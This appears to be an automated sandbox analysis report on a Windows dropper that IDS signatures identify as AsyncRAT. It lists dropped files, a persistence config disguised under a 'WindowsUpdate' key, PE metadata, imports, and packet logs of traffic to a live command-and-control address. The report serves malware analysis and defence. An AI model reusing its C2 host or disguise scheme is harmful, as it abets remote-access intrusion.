                                      Preview:DF3853Cv6G2uAvl9O8a03egwF4zKBMW8DT8F..UpDownConstants BorderConstants..ngD9b3GQ8VOF526bx..ToolbarConstants DateTimeConstants..0ZB2P1YA03zsxrOH71yMgRL56389398XddRO963kkRSN..FontConstants BorderConstants..7JO3CW7xBwJ5y4K43DNh6KCj9OT1jd1Ew8tp6201r2nCb..ButtonConstants ComboConstants..c985j8iDQC971U5Y3T773tV5518dH48VL29WUQm0A026K285qx161tcw0Es15vs5JgQJm3u43gvB..StructureConstants TreeViewConstants..4j1k4nK3ObA65TO265579892TH94a2C7Y7l6B76q5s7Qz50b06766dCMI9N16..ToolTipConstants ComboConstants..K3os83FI0IhD875J2nu..DateTimeConstants ToolbarConstants..
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):639
                                      Entropy (8bit):5.602648525665025
                                      Encrypted:false
                                      SSDEEP:12:EuAcO3XlFyzyVP21+KTizbQQ21BP42OHLLWHwl3MxKoH9Rd9qqPlWSOC7uWk:EUOHlWy4YKOz0Q21JoASu3dxP+6Zk
                                      MD5:D0C528931B9B927B80B3FF7191E579EB
                                      SHA1:2060A0C27AB1C778D6B70828C2DFF9D1059E1A70
                                      SHA-256:466DB50BDC62D3C43698CF27D34FF2589782A4C81776DD3D79AAC808208FB512
                                      SHA-512:D508F51FA8CBD713BF9CC426D175193C1D78B670D193A9C1037B4B8C3E89E76F1CE712C74A2917CE81A8B8BBC5A28F1118DB1938BB9880EBCE5241813D0E55CD
                                      Malicious:false
                                      Preview:l4eS1vLhg329by80Cr512210213opL99SyvX9jY9b82566q02W5a3G61O9845Y43549g8KvCLM2hIcF4OU0qb1dq82F4Tm566258E98082l..TreeViewConstants ToolbarConstants..QclN133d1Xdi55O1Dv59y2qL9x4d6eh5woj68u0AHV134C4cpP18p6m2Xq8H65597J52l4hImFd878nw81..FontConstants TreeViewConstants..Gleu275qKt3xw..BorderConstants DateTimeConstants..LD3Y034412Cyv93x9Y96Mi75899PWb43bphphSr9qclQ3u70o55884u79f8e8XBBpi358P8cUj024rnOb..StructureConstants StructureConstants..Dk6W083Uohe2V6aL2P7bX204YIg3Au21W113f2r965098PZ01d2H53c99qhz22287719T5Q715E32a7S34PD789Dr0M5748h01xM75i8pwQv34G84Lo8kd4aEJt7amEFD4QZsO4RH768p825AF6q7iOg22f06pTCgNiVX37zn..ToolTipConstants UpDownConstants..
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):568
                                      Entropy (8bit):5.5561410123959805
                                      Encrypted:false
                                      SSDEEP:12:V8/EbUgzwRzDaaoTdvq8ZcYij13oADRywploryNBc5Qa3IPqUGvxTPrBPc:rwiKartqacYijCAtyAlormI3IyUGvtO
                                      MD5:F1A870694962DA77AF70D0D8180AF415
                                      SHA1:3686ECC61CF21D56C70C7F71160CC0ABC5D438D3
                                      SHA-256:2E3AC55B4C9E18CC1B11F739089EB6A0382AB64DF61D7FFB60B6E21B1A3B2852
                                      SHA-512:74CE196CDBDC9F308DBA90E8146768FDC7AEBEF286B028F741BED0903C3A68FEB820C1FB46B021F804DEFAE8647C1AC0309EAC3AEE320B22EC3011FAD9F3B6AB
                                      Malicious:false
                                      Preview:7doUr0WOs6Q7hdA355013Q1YC3lIKjAF37D5m1195tL7fa4pg2IQ69iFuA0Ja1yd14ThC9jVz248Cv825do0ZO88u160Aoku7j10Ek23uJ739X130M871fH5T8TT28e72Iwvn8XA6Ta7879OqL..ToolTipConstants BorderConstants..89h5V3250i86Bx8221dhTaME99T77P77pz1TA596j858i4yR6xi11xCk8as220531O3o2874fhj7T..ButtonConstants StructureConstants..D778Tr9Cs5pA16175pum81cnj7AT0E8313py59iipwQ1..ButtonConstants GuiDateTimePicker..VMW60ld653KZ3g103o028764Jt3c7CD..UpDownConstants ComboConstants..bxgd91A8C9SReE238cjAgwE7EZhm448IM7241g308u304j4h91la94oNV997MB6fmFdAh42f6Cvd21XUy1PjJ1..TreeViewConstants TreeViewConstants..
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):114364086
                                      Entropy (8bit):7.089953620024949
                                      Encrypted:false
                                      SSDEEP:12288:lqYTpLqYTpCqYTpGqYTpMqYTp4qYTpGqYTprqYTpOqYTp9qYTpjqYTpuqYTp+qY0:s1
                                      MD5:3F2E528480F94C8DB48BE4427CB904FC
                                      SHA1:2E8C1007444E32B481B87AD89FE0DF37A0BD1BE8
                                      SHA-256:9066F65824D720DFE4B8EEDB19C196B10846A84CA78B7637C0D6632409B3C53E
                                      SHA-512:A40F02857F1BBCF4B764476708D4B5A10A7F0968D0EB9BE301D0881D77187207715B987587140ACBA4D38B062C5FF96836D21A8EAC2A9A540F8E13448A337964
                                      Malicious:true
                                      Preview:..;..#ch.UJ...4.........R.T..."?..R...X.eD..bi..G}cW$...Q.e.nR~.@.....vhlM..f.bD=...x%/A/b..C..O........#.c.s...2:........eS.W.J...j.Q....l"...9. .......l..%S...=........R..U9...%..../...c...L.T.Y....D...n...'..=.y%....f@v.....Gi.4^g........Q...E"..q..D.-&.....D..E...v....t.)....y/*jxW=... 4uzY.....{f.>n...#.....#.2;.)....b2(.|M*....$ic..Lr~.f.*.z.#Dl.....;......j.w.D......b..8..U.q.ZWM!...Kf........GW..Ecc....[...."&Ji..K..../!Ai.....'..}<.-A..gR.J...8U>.)....:p.J.,.)....=-......eg.O.`,u..y.~..l..../.Tg.^*.l....m..VT4.(.c...1k`....%....L........s...Hj..1......!uk.:..B....P.,I]*..Z..Oo. 8..U...4o.L.....@.@......m.`4Ukj.P!.."..............i....&.2.tr. ,A..=7vs..ec..../....Hf;r..q.>...j..3 ..R).j.....Z.t...L..;....m...:..I^#@A.#...c(@.......Y.....-...G.M..1..i$'%.Xk'....2.5.h.o.E.5.0.5.3.1.w.1.E.k.4.9.L.2.o.E.5.5.h.8.4.8.q.5.d.L.9.8.5.z.....B.1.L.6.q.7.L.5.5.r.M.1.8.3.i.K.3.8.1.1.Z.7.2.6.0.6.o.8.6.L.M.0.x.X.5.S.R.B.5.4.....b.7.I.S.
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):80
                                      Entropy (8bit):4.840634426587139
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:09718BC0899AF7E0A7BC2F64308A4571
                                      SHA1:1E850736F79B88CBBE25053C2C028C0202C9B555
                                      SHA-256:A7FD57763F2229FC23DC7F9C1F7C660E5D8519605D265C3DBD14C763CA328302
                                      SHA-512:513B61A1427C4720ED77FB82D98CFC8CA4294C886777B07D24E679192B9E2ED2AF7A2E3789E74694EB2F149089E881BF04BB45DA4725B8BB248472884DBDAD66
                                      Malicious:false
                                      Preview:[S3tt!ng]..stpths=%temp%..Key=WindowsUpdate..Dir3ctory=afda..ExE_c=cipkucw.ppt..
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.6731471205184265
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:yjOJ1YK5M3.exe
                                      File size:1'020'449 bytes
                                      MD5:7b17ebbf77f53472d2febb38e9785026
                                      SHA1:f3e6e40de8a8ca8b7cc3f8f4d636ad788df39935
                                      SHA256:c23b7950208b8f8e8a22c401cb5e9a05e560ae6119307d975ba601b4e2e99273
                                      SHA512:40aeebe55e881e59d0a765a03dcf9d626cf6b83bf7fa667f63098c18d8d745f225a7d779ba1abaae1fdb185695df8bece6f7231c0b6c294ba52a48a5f083d4ac
                                      SSDEEP:24576:hN/BUBb+tYjBFHL68+WHE3YLXiM0hD6di/AX:jpUlRhTfHEoLXiM0hDTU
                                      TLSH:B4250212B7C480B2D0B229324AB6D750167D7D612F658A8F53E03DBEAB705D2D631FA3
                                      File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......v..p2.b#2.b#2.b#.E.#?.b#.E.#..b#.E.#*.b#...#0.b#..f"!.b#..a"*.b#..g"..b#;..#9.b#;..#5.b#2.c#,.b#..g"..b#..b"3.b#...#3.b#..`"3.b
                                      Icon Hash:260e087d1f333737
                                      Entrypoint:0x4265d0
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x6640971F [Sun May 12 10:17:03 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:1
                                      File Version Major:5
                                      File Version Minor:1
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:1
                                      Import Hash:99ee65c2db82c04251a5c24f214c8892
                                      Instruction
                                      call 00007F4F20CF23CBh
                                      jmp 00007F4F20CF1D4Dh
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      push ecx
                                      lea ecx, dword ptr [esp+08h]
                                      sub ecx, eax
                                      and ecx, 0Fh
                                      add eax, ecx
                                      sbb ecx, ecx
                                      or eax, ecx
                                      pop ecx
                                      jmp 00007F4F20CF13FFh
                                      push ecx
                                      lea ecx, dword ptr [esp+08h]
                                      sub ecx, eax
                                      and ecx, 07h
                                      add eax, ecx
                                      sbb ecx, ecx
                                      or eax, ecx
                                      pop ecx
                                      jmp 00007F4F20CF13E9h
                                      push ebp
                                      mov ebp, esp
                                      sub esp, 0Ch
                                      lea ecx, dword ptr [ebp-0Ch]
                                      call 00007F4F20CE4929h
                                      push 0044634Ch
                                      lea eax, dword ptr [ebp-0Ch]
                                      push eax
                                      call 00007F4F20CF2BF7h
                                      int3
                                      jmp 00007F4F20CF892Eh
                                      int3
                                      int3
                                      push 004293C0h
                                      push dword ptr fs:[00000000h]
                                      mov eax, dword ptr [esp+10h]
                                      mov dword ptr [esp+10h], ebp
                                      lea ebp, dword ptr [esp+10h]
                                      sub esp, eax
                                      push ebx
                                      push esi
                                      push edi
                                      mov eax, dword ptr [00449778h]
                                      xor dword ptr [ebp-04h], eax
                                      xor eax, ebp
                                      push eax
                                      mov dword ptr [ebp-18h], esp
                                      push dword ptr [ebp-08h]
                                      mov eax, dword ptr [ebp-04h]
                                      mov dword ptr [ebp-04h], FFFFFFFEh
                                      mov dword ptr [ebp-08h], eax
                                      lea eax, dword ptr [ebp-10h]
                                      mov dword ptr fs:[00000000h], eax
                                      ret
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      mov ecx, dword ptr [ebp-10h]
                                      mov dword ptr fs:[00000000h], ecx
                                      pop ecx
                                      pop edi
                                      pop edi
                                      pop esi
                                      pop ebx
                                      mov esp, ebp
                                      pop ebp
                                      push ecx
                                      ret
                                      push ebp
                                      mov ebp, esp
                                      Programming Language:
                                      • [ C ] VS2008 SP1 build 30729
                                      • [IMP] VS2008 SP1 build 30729
                                      Name | Virtual Address | Virtual Size | Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x47d70 | 0x34 | .rdata
                                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x47da4 | 0x50 | .rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x58000 | 0x15b18 | .rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6e000 | 0x2afc | .reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x44580 | 0x54 | .rdata
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_TLS | 0x44600 | 0x18 | .rdata
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x3ec58 | 0x40 | .rdata
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_IAT | 0x3c000 | 0x280 | .rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x4722c | 0x120 | .rdata
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                      .text | 0x1000 | 0x3a32c | 0x3a400 | e320764e1b3c816ba80aeb820cb8a274 | False | 0.581381605418455 | data | 6.685359764265178 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata | 0x3c000 | 0xcbf8 | 0xcc00 | 47c3be3304bfdfb2a778f355849d1c3f | False | 0.4439529718137255 | data | 5.167069652624378 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data | 0x49000 | 0xd7e0 | 0x1200 | 6335f9314c2900dccb530e151f1b1ee8 | False | 0.3956163194444444 | data | 4.0290550032041 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .didat | 0x57000 | 0x1a8 | 0x200 | 232a8fe82993b55cefe09cffc39a79b0 | False | 0.462890625 | data | 3.5080985761326375 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc | 0x58000 | 0x15b18 | 0x15c00 | 01347fc060c4871e2beac057b6f6bee3 | False | 0.6677779274425287 | data | 6.453733102547725 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc | 0x6e000 | 0x2afc | 0x2c00 | 98fd4bc572f87a21f69dc57f720a6dbc | False | 0.75 | data | 6.617141671767599 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x58824 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
PNG | 0x5936c | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
RT_ICON | 0x5a918 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | | | 0.32682926829268294
RT_ICON | 0x5af80 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | | | 0.43548387096774194
RT_ICON | 0x5b268 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | | | 0.514344262295082
RT_ICON | 0x5b450 | 0x1c8 | Device independent bitmap graphic, 22 x 44 x 4, image size 264 | | | 0.5241228070175439
RT_ICON | 0x5b618 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | | | 0.5878378378378378
RT_ICON | 0x5b740 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | | | 0.5053304904051172
RT_ICON | 0x5c5e8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | | | 0.634927797833935
RT_ICON | 0x5ce90 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | | | 0.532258064516129
RT_ICON | 0x5d558 | 0x690 | Device independent bitmap graphic, 22 x 44 x 8, image size 528, 256 important colors | | | 0.544047619047619
RT_ICON | 0x5dbe8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | | | 0.3872832369942196
RT_ICON | 0x5e150 | 0x8620 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9990097856477167
RT_ICON | 0x66770 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | | | 0.34948132780082986
RT_ICON | 0x68d18 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | | | 0.4376172607879925
RT_ICON | 0x69dc0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | | | 0.41721311475409834
RT_ICON | 0x6a748 | 0x810 | Device independent bitmap graphic, 22 x 44 x 32, image size 2024 | | | 0.48546511627906974
RT_ICON | 0x6af58 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | | | 0.6214539007092199
RT_DIALOG | 0x6b3c0 | 0x286 | data | English | United States | 0.5092879256965944
RT_DIALOG | 0x6b648 | 0x13a | data | English | United States | 0.60828025477707
RT_DIALOG | 0x6b784 | 0xec | data | English | United States | 0.6991525423728814
RT_DIALOG | 0x6b870 | 0x12e | data | English | United States | 0.5927152317880795
RT_DIALOG | 0x6b9a0 | 0x338 | data | English | United States | 0.45145631067961167
RT_DIALOG | 0x6bcd8 | 0x252 | data | English | United States | 0.5757575757575758
RT_STRING | 0x6bf2c | 0x1e2 | data | English | United States | 0.3900414937759336
RT_STRING | 0x6c110 | 0x1cc | data | English | United States | 0.4282608695652174
RT_STRING | 0x6c2dc | 0x1b8 | data | English | United States | 0.45681818181818185
RT_STRING | 0x6c494 | 0x146 | data | English | United States | 0.5153374233128835
RT_STRING | 0x6c5dc | 0x46c | data | English | United States | 0.3454063604240283
RT_STRING | 0x6ca48 | 0x166 | data | English | United States | 0.49162011173184356
RT_STRING | 0x6cbb0 | 0x152 | data | English | United States | 0.5059171597633136
RT_STRING | 0x6cd04 | 0x10a | data | English | United States | 0.49624060150375937
RT_STRING | 0x6ce10 | 0xbc | data | English | United States | 0.6329787234042553
RT_STRING | 0x6cecc | 0x1c0 | data | English | United States | 0.5178571428571429
RT_STRING | 0x6d08c | 0x250 | data | English | United States | 0.44256756756756754
RT_GROUP_ICON | 0x6d2dc | 0xe6 | data | | | 0.5739130434782609
RT_MANIFEST | 0x6d3c4 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
DLL | Import
KERNEL32.dll | LocalFree, GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, GlobalMemoryStatusEx, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, IsValidCodePage, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, HeapReAlloc, LCMapStringW, FindFirstFileExA, FindNextFileA
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-31T20:26:35.833177+0100 | 2842478 | ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) | 1 | 195.26.255.81 | 2106 | 192.168.2.4 | 49737 | TCP
2024-12-31T20:26:35.833177+0100 | 2030673 | ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server) | 1 | 195.26.255.81 | 2106 | 192.168.2.4 | 49737 | TCP
2024-12-31T20:26:35.833177+0100 | 2035595 | ET MALWARE Generic AsyncRAT Style SSL Cert | 1 | 195.26.255.81 | 2106 | 192.168.2.4 | 49737 | TCP
2024-12-31T20:26:35.833177+0100 | 2035607 | ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server) | 1 | 195.26.255.81 | 2106 | 192.168.2.4 | 49737 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 31, 2024 20:26:35.258738995 CET | 49737 | 2106 | 192.168.2.4 | 195.26.255.81
Dec 31, 2024 20:26:35.263681889 CET | 2106 | 49737 | 195.26.255.81 | 192.168.2.4
Dec 31, 2024 20:26:35.267362118 CET | 49737 | 2106 | 192.168.2.4 | 195.26.255.81
Dec 31, 2024 20:26:35.294635057 CET | 49737 | 2106 | 192.168.2.4 | 195.26.255.81
Dec 31, 2024 20:26:35.299410105 CET | 2106 | 49737 | 195.26.255.81 | 192.168.2.4
Dec 31, 2024 20:26:35.788280010 CET | 2106 | 49737 | 195.26.255.81 | 192.168.2.4
Dec 31, 2024 20:26:35.788295031 CET | 2106 | 49737 | 195.26.255.81 | 192.168.2.4
Dec 31, 2024 20:26:35.788414955 CET | 49737 | 2106 | 192.168.2.4 | 195.26.255.81
Dec 31, 2024 20:26:35.828351974 CET | 49737 | 2106 | 192.168.2.4 | 195.26.255.81
Dec 31, 2024 20:26:35.833177090 CET | 2106 | 49737 | 195.26.255.81 | 192.168.2.4
Dec 31, 2024 20:26:35.950146914 CET | 2106 | 49737 | 195.26.255.81 | 192.168.2.4
Dec 31, 2024 20:26:35.990555048 CET | 49737 | 2106 | 192.168.2.4 | 195.26.255.81
Dec 31, 2024 20:26:36.475635052 CET | 49737 | 2106 | 192.168.2.4 | 195.26.255.81
Dec 31, 2024 20:26:36.480632067 CET | 2106 | 49737 | 195.26.255.81 | 192.168.2.4
Dec 31, 2024 20:26:36.480686903 CET | 49737 | 2106 | 192.168.2.4 | 195.26.255.81
Dec 31, 2024 20:26:36.485467911 CET | 2106 | 49737 | 195.26.255.81 | 192.168.2.4
Dec 31, 2024 20:26:39.548692942 CET | 2106 | 49737 | 195.26.255.81 | 192.168.2.4
Dec 31, 2024 20:26:39.599956989 CET | 49737 | 2106 | 192.168.2.4 | 195.26.255.81
Dec 31, 2024 20:26:39.635247946 CET | 2106 | 49737 | 195.26.255.81 | 192.168.2.4
Dec 31, 2024 20:26:39.678073883 CET | 49737 | 2106 | 192.168.2.4 | 195.26.255.81
Dec 31, 2024 20:26:44.381424904 CET | 49737 | 2106 | 192.168.2.4 | 195.26.255.81
Dec 31, 2024 20:26:44.386334896 CET | 2106 | 49737 | 195.26.255.81 | 192.168.2.4
Dec 31, 2024 20:26:44.389640093 CET | 49737 | 2106 | 192.168.2.4 | 195.26.255.81
Dec 31, 2024 20:26:44.394484043 CET | 2106 | 49737 | 195.26.255.81 | 192.168.2.4
Dec 31, 2024 20:26:44.626848936 CET | 2106 | 49737 | 195.26.255.81 | 192.168.2.4
Dec 31, 2024 20:26:44.678112030 CET | 49737 | 2106 | 192.168.2.4 | 195.26.255.81
Dec 31, 2024 20:26:44.713973045 CET | 2106 | 49737 | 195.26.255.81 | 192.168.2.4
Dec 31, 2024 20:26:44.716285944 CET | 49737 | 2106 | 192.168.2.4 | 195.26.255.81
Dec 31, 2024 20:26:44.721044064 CET | 2106 | 49737 | 195.26.255.81 | 192.168.2.4
Dec 31, 2024 20:26:44.721093893 CET | 49737 | 2106 | 192.168.2.4 | 195.26.255.81
Dec 31, 2024 20:26:44.725852013 CET | 2106 | 49737 | 195.26.255.81 | 192.168.2.4
Dec 31, 2024 20:26:52.373943090 CET | 49737 | 2106 | 192.168.2.4 | 195.26.255.81
Dec 31, 2024 20:26:52.378832102 CET | 2106 | 49737 | 195.26.255.81 | 192.168.2.4
Dec 31, 2024 20:26:52.378884077 CET | 49737 | 2106 | 192.168.2.4 | 195.26.255.81
Dec 31, 2024 20:26:52.383660078 CET | 2106 | 49737 | 195.26.255.81 | 192.168.2.4
Dec 31, 2024 20:26:52.572078943 CET | 2106 | 49737 | 195.26.255.81 | 192.168.2.4
Dec 31, 2024 20:26:52.615619898 CET | 49737 | 2106 | 192.168.2.4 | 195.26.255.81
Dec 31, 2024 20:26:52.700244904 CET | 2106 | 49737 | 195.26.255.81 | 192.168.2.4
Dec 31, 2024 20:26:52.701901913 CET | 49737 | 2106 | 192.168.2.4 | 195.26.255.81
Dec 31, 2024 20:26:52.706684113 CET | 2106 | 49737 | 195.26.255.81 | 192.168.2.4
Dec 31, 2024 20:26:52.706727982 CET | 49737 | 2106 | 192.168.2.4 | 195.26.255.81
Dec 31, 2024 20:26:52.711545944 CET | 2106 | 49737 | 195.26.255.81 | 192.168.2.4
Dec 31, 2024 20:27:00.256613016 CET | 49737 | 2106 | 192.168.2.4 | 195.26.255.81
Dec 31, 2024 20:27:00.261533022 CET | 2106 | 49737 | 195.26.255.81 | 192.168.2.4
Dec 31, 2024 20:27:00.261580944 CET | 49737 | 2106 | 192.168.2.4 | 195.26.255.81
Dec 31, 2024 20:27:00.266334057 CET | 2106 | 49737 | 195.26.255.81 | 192.168.2.4
Dec 31, 2024 20:27:00.473922968 CET | 2106 | 49737 | 195.26.255.81 | 192.168.2.4
Dec 31, 2024 20:27:00.521909952 CET | 49737 | 2106 | 192.168.2.4 | 195.26.255.81
Dec 31, 2024 20:27:00.608197927 CET | 2106 | 49737 | 195.26.255.81 | 192.168.2.4
Dec 31, 2024 20:27:00.609352112 CET | 49737 | 2106 | 192.168.2.4 | 195.26.255.81
Dec 31, 2024 20:27:00.614104033 CET | 2106 | 49737 | 195.26.255.81 | 192.168.2.4
Dec 31, 2024 20:27:00.614171028 CET | 49737 | 2106 | 192.168.2.4 | 195.26.255.81
Dec 31, 2024 20:27:00.618910074 CET | 2106 | 49737 | 195.26.255.81 | 192.168.2.4
Dec 31, 2024 20:27:08.147305012 CET | 49737 | 2106 | 192.168.2.4 | 195.26.255.81
Dec 31, 2024 20:27:08.152194977 CET | 2106 | 49737 | 195.26.255.81 | 192.168.2.4
Dec 31, 2024 20:27:08.152260065 CET | 49737 | 2106 | 192.168.2.4 | 195.26.255.81
Dec 31, 2024 20:27:08.157001019 CET | 2106 | 49737 | 195.26.255.81 | 192.168.2.4
Dec 31, 2024 20:27:08.339478016 CET | 2106 | 49737 | 195.26.255.81 | 192.168.2.4
Dec 31, 2024 20:27:08.396939993 CET | 49737 | 2106 | 192.168.2.4 | 195.26.255.81
Dec 31, 2024 20:27:08.468144894 CET | 2106 | 49737 | 195.26.255.81 | 192.168.2.4
Dec 31, 2024 20:27:08.472851038 CET | 49737 | 2106 | 192.168.2.4 | 195.26.255.81
Dec 31, 2024 20:27:08.477684975 CET | 2106 | 49737 | 195.26.255.81 | 192.168.2.4
Dec 31, 2024 20:27:08.479471922 CET | 49737 | 2106 | 192.168.2.4 | 195.26.255.81
Dec 31, 2024 20:27:08.484263897 CET | 2106 | 49737 | 195.26.255.81 | 192.168.2.4
Dec 31, 2024 20:27:10.475605965 CET | 2106 | 49737 | 195.26.255.81 | 192.168.2.4
Dec 31, 2024 20:27:10.521969080 CET | 49737 | 2106 | 192.168.2.4 | 195.26.255.81
Dec 31, 2024 20:27:10.608160973 CET | 2106 | 49737 | 195.26.255.81 | 192.168.2.4
